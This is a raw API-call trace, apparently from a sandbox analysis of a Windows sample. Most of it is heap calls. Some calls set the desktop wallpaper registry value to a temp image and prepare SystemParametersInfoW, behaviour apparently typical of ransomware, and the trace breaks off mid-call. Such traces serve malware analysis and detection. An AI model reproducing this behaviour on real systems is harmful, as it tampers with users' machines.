RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0289.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0289.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0289.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0289.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0289.642] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0289.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0289.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0289.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0289.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0289.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0289.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0289.642] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0289.642] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0289.643] RegCloseKey (hKey=0x294) returned 0x0 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0289.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0289.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0289.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0289.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0289.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0289.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0289.644] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0289.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0289.644] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0289.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0289.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0289.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0289.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0289.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0289.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0289.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0289.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0289.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0289.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0289.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0289.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0289.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0289.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0289.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0289.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0289.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0289.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0289.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0289.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0289.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0289.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0289.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0289.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0289.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0289.650] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0289.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0289.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0289.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0289.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0289.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0289.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0289.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0289.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0289.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0289.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0289.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0289.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0289.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0289.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0289.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0289.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0289.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0289.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0289.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0289.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0289.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0289.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0289.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0289.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0289.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0289.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0289.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0289.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0289.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0289.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0289.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0289.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0289.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0289.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0289.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0289.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0289.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0289.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0289.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0289.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0289.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0289.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0289.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0289.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0289.660] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0289.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0289.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0289.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 